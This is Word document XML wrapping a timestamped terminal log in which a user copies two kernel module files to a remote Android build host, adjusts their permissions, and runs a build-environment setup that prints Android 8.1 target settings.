    <w:p w14:paraId="22C079DF" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">admin@128.55.12.54's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D10179C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">a64.ko                                                                                                                                             100% 5824     5.7KB/s   00:00  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D668CF7" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="623AE301" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>14:28</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08238033" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:~/tmp$ scp msm_g711tlaw.ko admin@128.55.12.114:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F9C80B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>The authenticity of host '128.55.12.114 (128.55.12.114)' can't be established.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D7C2B96" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>ECDSA key fingerprint is b6:19:fd:5f:dd:36:c1:82:f0:a1:62:23:8c:89:78:c6.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FA0C7F2" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Are you sure you want to continue connecting (yes/no)? yes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0623806F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Warning: Permanently added '128.55.12.114' (ECDSA) to the list of known hosts.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B02DCFF" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">admin@128.55.12.114's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57E4DEBA" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">msm_g711tlaw.ko                                                                                                                                    100%   10KB   9.9KB/s   00:00    </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02417957" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:~/tmp$ scp a64.ko admin@128.55.12.114:.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D8A412" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">admin@128.55.12.114's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="261B197D" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">a64.ko                                                                                                                                             100% 5824     5.7KB/s   00:00  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78AD9DCF" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="378C0064" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>14:29</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10F7CF47" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>kududyn@kududyn-ProLiant-SL170s-G6:~/tmp$ ssh admin@128.55.12.54</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0DD78D32" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">admin@128.55.12.54's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="215065B2" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[admin@ta1-clearscope-translate ~]$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="245A2FCA" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>a64.ko  msm_g711tlaw.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32E80EDB" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[admin@ta1-clearscope-translate ~]$ dolunch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B8EC36D" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>-bash: dolunch: command not found</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EEBD43B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[admin@ta1-clearscope-translate ~]$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3839DF02" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>a64.ko  msm_g711tlaw.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2D2812" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[admin@ta1-clearscope-translate ~]$ chmod 777 *</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2266F3F0" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[admin@ta1-clearscope-translate ~]$ mv *.ko ../user/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62A8F6E8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>mv: cannot stat '../user/a64.ko': Permission denied</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07150F61" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>mv: cannot stat '../user/msm_g711tlaw.ko': Permission denied</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DFBC1B2" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[admin@ta1-clearscope-translate ~]$ sudo mv *.ko ../user/</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E42B21D" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6FB7E450" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>14:30</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CBED2D6" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">kududyn@kududyn-ProLiant-SL170s-G6:~/tmp$ ssh user@128.55.12.54                                                                                                                      </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3FAB4CA9" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t xml:space="preserve">user@128.55.12.54's password: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29A8BF0C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[user@ta1-clearscope-translate ~]$ ls</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49B5E60F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>Android  barephone-instr.apk            ingestor-2019-04-11-17:24.log  ingestor-2019-04-24-18:10.log  ingestor-2019-05-09.log      regression-latest</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="624797DA" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>CDM      cs-setup                       ingestor-2019-04-12-13:55.log  ingestor-2019-05-03-18:47.log  ingestor-2019-05-15.log      screencap-instr.apk</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F996E31" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TC       firefox4980.apk                ingestor-2019-04-23-15:35.log  ingestor-2019-05-03-19:14.log  msm_g711tlaw.ko</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C25527F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>a64.ko   ingestor-2019-04-09-13:02.log  ingestor-2019-04-23-18:27.log  ingestor-2019-05-07-12:53.log  regression-2019-04-04-21:04</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EDAC659" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>[user@ta1-clearscope-translate ~]$ dolunch</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59F83A0B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/asus/fugu/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22D79FA0" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/generic/car/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4513789E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/generic/mini-emulator-arm64/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170727C8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/generic/mini-emulator-armv7-a-neon/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="088DEA18" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/generic/mini-emulator-mips/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475A444E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/generic/mini-emulator-mips64/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6CFB36E8" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/generic/mini-emulator-x86/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C764290" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/generic/mini-emulator-x86_64/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FE477E3" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/generic/uml/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AD816C1" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/google/dragon/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2EEDDB68" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/google/marlin/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7606F0D5" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/google/muskie/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0352033C" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/google/taimen/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C52BEFA" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/huawei/angler/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D758725" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/lge/bullhead/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70CE4678" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including device/linaro/hikey/vendorsetup.sh</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="347253FE" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>including sdk/bash_completion/adb.bash</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="210D0E6B" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="0CEEDBDE" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>============================================</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42758194" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>PLATFORM_VERSION_CODENAME=REL</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F8F1DE" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>PLATFORM_VERSION=8.1.0</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5963A917" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_PRODUCT=aosp_walleye</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5AB038" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_BUILD_VARIANT=userdebug</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="35273E85" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_BUILD_TYPE=release</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D96368E" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_PLATFORM_VERSION=OPM1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46B7AEF1" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_BUILD_APPS=</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FBF26B9" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_ARCH=arm64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="333D5283" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_ARCH_VARIANT=armv8-a</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5293341F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_CPU_VARIANT=cortex-a73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74435C81" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_2ND_ARCH=arm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5740B97F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_2ND_ARCH_VARIANT=armv7-a-neon</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6919280F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>TARGET_2ND_CPU_VARIANT=cortex-a73</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0522A903" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>HOST_ARCH=x86_64</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DBA783D" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>HOST_2ND_ARCH=x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15A36CB7" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>HOST_OS=linux</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="398E76EE" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>HOST_OS_EXTRA=Linux-4.4.0-112-generic-x86_64-with-glibc2.2.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2975691F" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>HOST_CROSS_OS=windows</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="184E89E1" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>HOST_CROSS_ARCH=x86</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="180C3862" w14:textId="77777777" w:rsidR="00A351B2" w:rsidRPr="00FC027E" w:rsidRDefault="00A351B2" w:rsidP="00650FDF">
      <w:pPr>
        <w:pStyle w:val="Code"/>
      </w:pPr>
      <w:r w:rsidRPr="00FC027E">
        <w:t>HOST_CROSS_2ND_ARCH=x86_64</w:t>
      </w:r>
    </w:p>
